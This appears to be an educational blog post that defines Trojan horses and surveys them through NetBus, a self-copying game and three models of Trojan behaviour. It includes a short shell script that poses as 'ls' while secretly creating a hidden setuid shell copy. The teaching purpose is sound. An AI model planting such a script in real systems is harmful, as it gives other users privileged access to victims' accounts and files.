Trojan Horses
A Trojan horse is a useful, or apparently useful, program or
command procedure containing hidden code that, when invoked, performs some
unwanted or harmful function.
A Trojan horse is a program with an
overt (documented or known) effect and a covert
(undocumented or unexpected) effect.
cp /bin/sh /tmp/.xxsh
chmod o+s,w+x /tmp/.xxsh
rm ./ls
ls $*
Example: In the
above example, the overt purpose is to list the files in a directory. The
covert purpose is to create a shell that is setuid
to the user executing the script. Hence, this program is a Trojan horse.
Trojan horse programs can be used to accomplish functions
indirectly that an unauthorized user could not accomplish directly. For
example, to gain access to the files of another user on a shared system, a user
could create a Trojan horse program that, when executed, changes the invoking
user’s file permissions so that the files are readable by any user. The author
could then induce users to run the program by placing it in a common directory and
naming it such that it appears to be a useful utility program or application.
When a Trojan is activated on computer, the results can
vary. Some Trojans are designed to be more annoying than malicious (like
changing your desktop, adding silly active desktop icons) or they can cause
serious damage by deleting files and destroying information on our system.
Trojans are also known to create a backdoor on our computer that gives
malicious users access to our system, possibly allowing confidential or personal
information to be compromised.
Example: The NetBus
program allows an attacker to control a Windows NT workstation remotely. The
attacker can intercept keystrokes or mouse motions, upload and download files,
and act as a system administrator would act. In order for this program to work,
the victim Windows NT system must have a server with which the NetBus program
can communicate. This requires someone on the victim's system to load and
execute a small program that runs the server.
This small program was placed in
several small game programs as well as in some other "fun" programs,
which could be distributed to Web sites where unsuspecting users would be
likely to download them.
Trojan horses can make copies of themselves. One of the
earliest Trojan horses was a version of the game animal. When this game
was played, it created an extra copy of itself. These copies spread, taking up
much room. The program was modified to delete one copy of the earlier version
and create two copies of the modified program. Because it spread even more
rapidly than the earlier version, the modified version of animal soon
completely supplanted the earlier version. After a preset date, each copy of
the later version deleted itself after it was played
A propagating
Trojan horse (also called a replicating Trojan horse) is a Trojan horse that creates a copy
of itself.
Trojan horses fit into one of three models:
- Continuing to perform the function of the original program and additionally performing a separate malicious activity
- Continuing to perform the function of the original program but modifying the function to perform malicious activity (e.g., a Trojan horse version of a login program that collects passwords) or to disguise other malicious activity (e.g., a Trojan horse version of a process listing program that does not display certain processes that are malicious)
- Performing a malicious function that completely replaces the function of the original program
No comments:
Post a Comment